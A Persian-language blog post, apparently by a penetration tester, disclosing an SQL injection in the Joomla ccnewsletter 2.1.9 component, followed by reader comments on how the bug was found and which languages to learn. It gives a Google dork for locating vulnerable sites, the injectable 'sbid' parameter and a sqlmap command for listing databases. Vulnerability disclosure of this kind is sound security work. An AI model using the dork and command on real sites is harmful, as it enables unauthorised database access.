شهاب شمسی

با تجربه در تست نفوذ  امن سازی سرور امن سازی شبکه برنامه نویسی  

Joomla Component ccnewsletter 2.1.9 – SQL Injection

 

حفره امنیتی SQL Injection در کامپوننت ccnewsletter در پنل مدیریت محتوای جوملا که امکان ارتباط و دسترسی را به دیتابیس برای نفوذگر فراهم می سازد. این آسیب پذیری در تاریخ ۲۶.۷.۲۰۱۷ توسط شهاب شمسی کشف و به ثبت رسید.

 

 

# Joomla Component ccnewsletter 2.1.9 – SQL Injection
# Date: 07-26-2017
# Exploit Author: Shahab Shamsi
# Version: = 2.1.9 [Final Version]
# Tested on: Win,Linux
# Google Dork: inurl:”index.php?option=com_ccnewsletter” inurl:sbid

 

 

Sqlmap:

sqlmap -u “http://target.com” -p sbid –dbs

 

Testing Method:
– boolean-based blind
– time-based blind
– UNION query


۴ دیدگاه

  • با سلام خدمت استاد عزیز. یه سوال داشتم : شما با مطاله سورس کد این باگ رو کشف کردید ؟

    • کشف آسیب پذیری به دو صورت انجام میگردد
      ۱- بررسی سورس
      ۲- آزمون خطا

      این آسیب پذیری بوسیله آزمون خطا کشف و به ثبت رسید

  • درود خدمت استاد عزیز
    برای کشف باگ باید چه زبان های برنامه نویسی رو یاد گرفت؟

    • اگر جهت مباحث کشف باگ وب مد نظرتون هست طبیعتا زبان های تحت وب پیشنهاد میگردد و پیشنهاد میکنم php باشه و زبان پایتون را نیز جهت مباحث اکسپلویت نویسی پیشنهاد میشه


پیام بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *